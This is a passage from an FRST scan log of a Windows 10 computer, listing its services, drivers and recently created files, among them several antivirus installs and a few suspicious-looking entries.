R2 McNaiAnn; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
S3 McODS; C:\Program Files\McAfee\VirusScan\mcods.exe [795528 2016-04-20] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [232688 2016-03-07] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [382456 2016-04-01] (McAfee, Inc.)
R2 mfevtp; C:\WINDOWS\system32\mfevtps.exe [277744 2016-03-07] (McAfee, Inc.)
R2 ModuleCoreService; C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe [1424352 2016-04-21] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [599864 2016-04-23] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [1029856 2016-04-21] (Intel Security, Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-09-15] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S4 AtherosSvc; [X]
S4 cudm; [X]
S4 Intel(R) Capability Licensing Service Interface; [X]
S2 Scheduler; "C:\Program Files (x86)\Windriver\Scheduler.Service.exe" [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\Windows\System32\drivers\athw10x.sys [4342936 2015-12-08] (Qualcomm Atheros Communications, Inc.)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [78632 2016-03-11] (McAfee, Inc.)
S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [22704 2016-05-25] ()
S3 GENERICDRV; C:\Program Files (x86)\UEFI WinFlash\amifldrv64.sys [15640 2012-07-27] ()
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207968 2016-02-24] (McAfee, Inc.)
R1 KbHook; C:\Program Files (x86)\AntiRansomware2.0\hookdriver64.sys [18720 2013-06-08] (<company name here>)
S3 libwamf; C:\Windows\System32\DRIVERS\libwamf.sys [15664 2016-05-24] (Windows (R) Win 7 DDK provider)
S3 libwasys; C:\Windows\System32\DRIVERS\libwasys.sys [28464 2016-05-24] ()
R2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [79192 2016-04-20] (McAfee, Inc.)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2016-03-11] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [349480 2016-03-11] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83608 2016-03-11] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [493352 2016-03-11] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [842536 2016-03-11] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [543488 2016-02-10] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2016-02-10] (McAfee, Inc.)
R3 mfesapsn; C:\Program Files (x86)\McAfee\SiteAdvisor\x64\mfesapsn.sys [45728 2016-03-15] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [243496 2016-03-11] (McAfee, Inc.)
R1 ndisrd; C:\Windows\system32\DRIVERS\ndisrfl.sys [50448 2015-07-28] (Intel Corporation)
S3 NetTap630; C:\Windows\system32\DRIVERS\nettap630.sys [76560 2015-07-29] (Intel Corporation)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-09] (Realtek Semiconductor Corp.)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-09-15] (Synaptics Incorporated)
R3 Thotkey; C:\Windows\System32\drivers\Thotkey.sys [54424 2015-07-29] (Toshiba Corporation)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
S1 13114cc54a946f641c081c84a88f491d; system32\DRIVERS\13114cc54a946f641c081c84a88f491d.sys [X]
S3 mfencbdc01; \Device\mfencbdc01.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-05-31 02:52 - 2016-05-31 02:54 - 00020393 _____ C:\Users\Jackie\Downloads\FRST.txt
2016-05-31 02:50 - 2016-05-31 02:51 - 02383872 _____ (Farbar) C:\Users\Jackie\Downloads\FRST64 (1).exe
2016-05-31 02:46 - 2016-05-31 02:52 - 00000000 ____D C:\FRST
2016-05-31 02:45 - 2016-05-31 02:46 - 02383872 _____ (Farbar) C:\Users\Jackie\Downloads\FRST64.exe
2016-05-30 22:10 - 2016-05-31 02:21 - 00004020 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse
2016-05-30 22:10 - 2016-05-30 22:10 - 00004208 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) Post DAT update endpoint safety pulse
2016-05-28 21:11 - 2016-05-30 21:51 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-05-28 21:11 - 2016-05-28 21:11 - 00001186 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-05-28 21:11 - 2016-05-28 21:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-05-28 21:11 - 2016-05-28 21:11 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2016-05-28 21:11 - 2016-03-10 14:09 - 00065408 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-05-28 21:11 - 2016-03-10 14:08 - 00140672 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-05-28 21:11 - 2016-03-10 14:08 - 00027008 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-05-28 21:10 - 2016-05-28 21:10 - 22851472 _____ (Malwarebytes ) C:\Users\Jackie\Downloads\mbam-setup-cnet.35891-2.2.1.1043.exe
2016-05-26 18:32 - 2016-05-26 18:32 - 00003642 _____ C:\WINDOWS\System32\Tasks\CreateExplorerShellUnelevatedTask
2016-05-26 18:30 - 2016-05-26 18:33 - 00001094 _____ C:\DelFix.txt
2016-05-26 18:30 - 2016-05-26 18:30 - 00000000 ____D C:\WINDOWS\ERUNT
2016-05-26 16:03 - 2016-05-30 23:18 - 00000000 __RSD C:\Users\Jackie\Documents\McAfee Vaults
2016-05-26 16:03 - 2016-05-26 16:03 - 00000000 ____D C:\Users\Jackie\AppData\Local\McAfee File Lock
2016-05-26 16:03 - 2016-04-20 11:00 - 00079192 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\McPvDrv.sys
2016-05-26 01:55 - 2016-05-26 01:55 - 00000000 ____D C:\Program Files (x86)\McAfee.com
2016-05-25 23:54 - 2016-05-28 20:43 - 00000892 _____ C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job
2016-05-25 23:54 - 2016-05-25 23:54 - 00003958 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player PPAPI Notifier
2016-05-25 23:12 - 2016-05-25 23:12 - 00987728 _____ (Google Inc.) C:\Users\Jackie\Downloads\ChromeSetup.exe
2016-05-25 21:57 - 2016-05-25 21:57 - 00000000 ____D C:\Program Files (x86)\VS Revo Group
2016-05-25 21:56 - 2016-05-25 21:56 - 02623656 _____ (VS Revo Group Ltd.) C:\Users\Jackie\Downloads\revosetup.exe
2016-05-25 21:32 - 2016-02-24 21:07 - 00207968 _____ (McAfee, Inc.) C:\WINDOWS\system32\Drivers\HipShieldK.sys
2016-05-25 21:27 - 2016-05-25 21:27 - 00000000 ____D C:\ProgramData\Intel Security
2016-05-25 21:26 - 2016-05-26 16:00 - 00003142 _____ C:\WINDOWS\System32\Tasks\McAfeeLogon
2016-05-25 21:23 - 2016-05-25 21:23 - 00000000 ____D C:\Program Files\McAfee.com
2016-05-25 21:22 - 2016-05-25 21:22 - 00000000 ____D C:\Program Files\Common Files\Intel Security
2016-05-25 21:21 - 2016-05-25 21:21 - 00000000 ____D C:\Program Files\Common Files\AV
2016-05-25 21:07 - 2016-03-07 15:38 - 00277744 _____ (McAfee, Inc.) C:\WINDOWS\system32\mfevtps.exe
2016-05-25 21:06 - 2016-05-25 21:06 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_v6MNfGYb2JXFv4AwyJs1gw2_key.exe
2016-05-25 19:20 - 2016-05-25 23:56 - 00000000 ____D C:\Program Files\Enigma Software Group
2016-05-25 19:20 - 2016-05-25 19:21 - 00000000 ____D C:\sh4ldr
2016-05-25 19:20 - 2016-05-25 19:20 - 00022704 _____ C:\WINDOWS\system32\Drivers\EsgScanner.sys
2016-05-25 19:19 - 2016-05-25 19:19 - 03482800 _____ (Enigma Software Group USA, LLC.) C:\Users\Jackie\Downloads\SpyHunter-Installer.exe
2016-05-25 18:11 - 2016-05-25 18:11 - 00000442 _____ C:\WINDOWS\DCEBOOT.RST
2016-05-25 18:08 - 2016-05-25 18:08 - 00231960 _____ C:\WINDOWS\RegBootClean64.exe
2016-05-25 18:08 - 2016-05-25 18:08 - 00021528 _____ C:\WINDOWS\DCEBoot64.exe
2016-05-25 18:04 - 2016-05-25 18:08 - 00000000 ____D C:\Program Files (x86)\AntiRansomware2.0
2016-05-25 18:04 - 2016-05-25 18:04 - 00000000 ____D C:\ProgramData\AntiRansomware
2016-05-25 15:30 - 2016-05-25 15:30 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\AVG
2016-05-25 15:27 - 2016-05-25 15:27 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\TuneUp Software
2016-05-25 15:26 - 2016-05-25 18:27 - 00000000 ___HD C:\$AVG
2016-05-25 15:24 - 2016-05-25 18:30 - 00000000 ____D C:\ProgramData\MFAData
2016-05-25 15:24 - 2016-05-25 15:24 - 00000000 ____D C:\Users\Jackie\AppData\Local\MFAData
2016-05-25 15:18 - 2016-05-25 18:35 - 00000000 ____D C:\ProgramData\Avg
2016-05-25 15:18 - 2016-05-25 18:34 - 00000000 ____D C:\Users\Jackie\AppData\Local\AvgSetupLog
2016-05-25 15:18 - 2016-05-25 18:30 - 00000000 ____D C:\Users\Jackie\AppData\Local\Avg
2016-05-25 14:41 - 2016-05-26 16:02 - 00000000 ____D C:\Program Files\Common Files\McAfee
2016-05-25 12:45 - 2016-05-26 16:00 - 00000000 ____D C:\WINDOWS\System32\Tasks\McAfee
2016-05-25 12:43 - 2016-05-26 16:03 - 00000000 ____D C:\Program Files\McAfee
2016-05-25 11:36 - 2016-05-25 11:37 - 00509440 _____ (Tech Support Guy System) C:\Users\Jackie\Downloads\SysInfo.exe
2016-05-25 07:28 - 2016-05-25 18:08 - 00000000 ____D C:\WINDOWS\Cudm1110
2016-05-24 19:49 - 2016-05-24 19:49 - 00028464 _____ C:\WINDOWS\system32\Drivers\libwasys.sys
2016-05-24 19:49 - 2016-05-24 19:49 - 00015664 _____ (Windows (R) Win 7 DDK provider) C:\WINDOWS\system32\Drivers\libwamf.sys
2016-05-24 17:01 - 2016-05-24 17:01 - 00000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2016-05-24 11:53 - 2016-05-26 16:07 - 00000000 ____D C:\Quarantine
2016-05-24 11:53 - 2016-05-24 11:55 - 00001735 _____ C:\config.ini
2016-05-24 01:55 - 2016-05-24 01:55 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Mozilla
2016-05-24 01:54 - 2016-05-24 01:54 - 06859776 _____ C:\Users\Jackie\AppData\Roaming\agent.dat
2016-05-24 01:54 - 2016-05-24 01:54 - 00018432 _____ C:\Users\Jackie\AppData\Roaming\Main.dat
2016-05-24 01:53 - 2016-05-24 01:53 - 00076565 _____ C:\Users\Jackie\AppData\Roaming\Mat-La.bin
2016-05-24 01:53 - 2016-05-24 01:53 - 00000000 _____ C:\WINDOWS\SysWOW64\Number of results
2016-05-24 01:52 - 2016-05-24 01:52 - 00127488 _____ C:\Users\Jackie\AppData\Roaming\Installer.dat
2016-05-24 01:31 - 2016-05-25 16:38 - 00000000 ____D C:\bin
2016-05-24 01:15 - 2016-05-25 18:18 - 00000000 ____D C:\WINDOWS\SysWOW64\CpuHeatMapping2200
2016-05-24 01:15 - 2016-05-24 01:15 - 00000000 ____D C:\Users\Jackie\AppData\Roaming\Securid
2016-05-24 01:03 - 2016-05-24 20:29 - 00187904 _____ C:\WINDOWS\rsrcs.dll
2016-05-24 01:02 - 2016-05-24 01:02 - 00024596 _____ C:\WINDOWS\System32\Tasks\{0A0A0A47-0E0D-780B-0A11-0E7E7909110B}
2016-05-24 01:02 - 2016-05-24 01:02 - 00003676 _____ C:\WINDOWS\System32\Tasks\TechAgent Task
2016-05-21 23:03 - 2016-05-21 23:09 - 00000000 ____D C:\ProgramData\Big Fish
2016-05-21 23:01 - 2016-05-21 23:03 - 00000000 ____D C:\Users\Jackie\AppData\Local\Big Fish
2016-05-21 22:30 - 2016-05-21 22:30 - 00000000 ____D C:\Program Files (x86)\ReflexiveArcade
2016-05-21 14:33 - 2016-05-21 14:33 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_lga7Zua5iehXUFMlXBiSWA2_key.exe
2016-05-21 14:32 - 2016-05-21 14:32 - 00000015 _____ C:\Users\Jackie\Documents\mcafee number.txt
2016-05-21 11:25 - 2016-05-21 11:25 - 08111368 _____ (McAfee, Inc.) C:\Users\Jackie\Downloads\Setup_serial_JB-vb5puYg2Co5a-3ijZgg2_key.exe
2016-05-20 11:54 - 2016-05-27 11:30 - 00000000 ____D C:\KVRT_Data
2016-05-18 22:06 - 2016-05-25 08:19 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2016-05-18 22:00 - 2016-05-25 16:38 - 00000000 ____D C:\ProgramData\RogueKiller
2016-05-18 20:27 - 2016-05-18 20:27 - 00000000 ____D C:\Program Files (x86)\NortonInstaller
2016-05-11 08:57 - 2016-05-11 08:57 - 00564736 _____ C:\WINDOWS\system32\bitst.exe
2016-05-10 16:52 - 2016-04-23 00:31 - 13018112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-05-10 16:51 - 2016-04-23 01:28 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-05-10 16:51 - 2016-04-23 01:24 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-05-10 16:51 - 2016-04-23 01:24 - 01819208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-05-10 16:51 - 2016-04-23 01:10 - 02919832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-05-10 16:51 - 2016-04-23 01:09 - 22561256 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-05-10 16:51 - 2016-04-23 01:09 - 05240960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-05-10 16:51 - 2016-04-23 01:08 - 06605504 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-05-10 16:51 - 2016-04-23 00:30 - 22379008 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-05-10 16:51 - 2016-04-23 00:28 - 16984576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-05-10 16:51 - 2016-04-23 00:26 - 00059904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MosStorage.dll
2016-05-10 16:51 - 2016-04-23 00:25 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-05-10 16:51 - 2016-04-23 00:23 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-05-10 16:51 - 2016-04-23 00:22 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-05-10 16:51 - 2016-04-23 00:22 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapConfiguration.dll
2016-05-10 16:51 - 2016-04-23 00:20 - 19344384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 07977472 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 01056256 _____ (Microsoft Corporation) C:\WINDOWS\system32\JpMapControl.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00853504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-05-10 16:51 - 2016-04-23 00:19 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 24604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NMAA.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00939520 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapControlCore.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-05-10 16:51 - 2016-04-23 00:18 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapConfiguration.dll
2016-05-10 16:51 - 2016-04-23 00:16 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\JpMapControl.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00792064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00784896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NMAA.dll
2016-05-10 16:51 - 2016-04-23 00:15 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-05-10 16:51 - 2016-04-23 00:14 - 13383168 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-05-10 16:51 - 2016-04-23 00:14 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapControlCore.dll
2016-05-10 16:51 - 2016-04-23 00:13 - 07200256 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-05-10 16:51 - 2016-04-23 00:13 - 06295552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-05-10 16:51 - 2016-04-23 00:10 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-05-10 16:51 - 2016-04-23 00:08 - 05324288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-05-10 16:51 - 2016-04-23 00:08 - 02061824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-05-10 16:51 - 2016-04-23 00:07 - 05205504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-05-10 16:51 - 2016-04-23 00:06 - 06974464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-05-10 16:51 - 2016-04-23 00:03 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-05-10 16:51 - 2016-04-23 00:02 - 07832576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-05-10 16:50 - 2016-05-06 00:53 - 00095072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdport.sys
2016-05-10 16:50 - 2016-05-06 00:05 - 00241664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptngc.dll
2016-05-10 16:50 - 2016-05-06 00:03 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-05-10 16:50 - 2016-05-05 23:53 - 00351232 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnr.dll
2016-05-10 16:50 - 2016-05-05 23:49 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\NgcCtnrSvc.dll
2016-05-10 16:50 - 2016-05-05 23:44 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-05-10 16:50 - 2016-05-05 23:43 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptngc.dll
2016-05-10 16:50 - 2016-05-05 23:23 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcpopkeysrv.dll
2016-05-10 16:50 - 2016-04-30 02:42 - 01387520 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-05-10 16:50 - 2016-04-30 02:31 - 03591168 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-05-10 16:50 - 2016-04-23 02:12 - 01401024 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 01184960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00713920 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00514752 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00294592 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00190144 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-05-10 16:50 - 2016-04-23 02:12 - 00092352 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2016-05-10 16:50 - 2016-04-23 02:12 - 00046784 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2016-05-10 16:50 - 2016-04-23 01:28 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-05-10 16:50 - 2016-04-23 01:26 - 00707608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 00754664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2016-05-10 16:50 - 2016-04-23 01:24 - 00638816 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fvevol.sys
2016-05-10 16:50 - 2016-04-23 01:24 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\fastfat.sys
2016-05-10 16:50 - 2016-04-23 01:24 - 00099680 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2016-05-10 16:50 - 2016-04-23 01:22 - 01161120 _____ (Microsoft Corporation) C:\WINDOWS\system32\rpcrt4.dll
2016-05-10 16:50 - 2016-04-23 01:18 - 00026408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
2016-05-10 16:50 - 2016-04-23 01:13 - 00502104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-05-10 16:50 - 2016-04-23 01:13 - 00306832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlanapi.dll
2016-05-10 16:50 - 2016-04-23 01:13 - 00084832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupApi.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00925064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfplat.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00451928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-05-10 16:50 - 2016-04-23 01:12 - 00413536 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifitask.exe
2016-05-10 16:50 - 2016-04-23 01:11 - 01092464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00696672 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00498960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00390496 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-05-10 16:50 - 2016-04-23 01:11 - 00131424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ufxsynopsys.sys
2016-05-10 16:50 - 2016-04-23 01:11 - 00115040 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupApi.dll
2016-05-10 16:50 - 2016-04-23 01:10 - 03673424 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-05-10 16:50 - 2016-04-23 01:10 - 00330072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-05-10 16:50 - 2016-04-23 01:09 - 21123320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-05-10 16:50 - 2016-04-23 01:09 - 04074160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00569744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SHCore.dll
2016-05-10 16:50 - 2016-04-23 01:09 - 00565600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00465760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00303216 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppHost.exe
2016-05-10 16:50 - 2016-04-23 01:09 - 00255168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LockAppHost.exe
2016-05-10 16:50 - 2016-04-23 01:08 - 04515256 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-05-10 16:50 - 2016-04-23 01:08 - 00725776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SHCore.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 01848072 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 01536088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 00204048 _____ (Microsoft Corporation) C:\WINDOWS\system32\rsaenh.dll
2016-05-10 16:50 - 2016-04-23 01:07 - 00183904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rsaenh.dll
2016-05-10 16:50 - 2016-04-23 01:06 - 00291360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininit.exe
2016-05-10 16:50 - 2016-04-23 01:02 - 00188256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 01996640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-05-10 16:50 - 2016-04-23 01:01 - 00650304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00619296 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10level9.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00577368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-05-10 16:50 - 2016-04-23 01:01 - 00522176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00513368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10level9.dll
2016-05-10 16:50 - 2016-04-23 01:01 - 00393568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-05-10 16:50 - 2016-04-23 01:01 - 00217440 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-05-10 16:50 - 2016-04-23 01:00 - 01776768 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
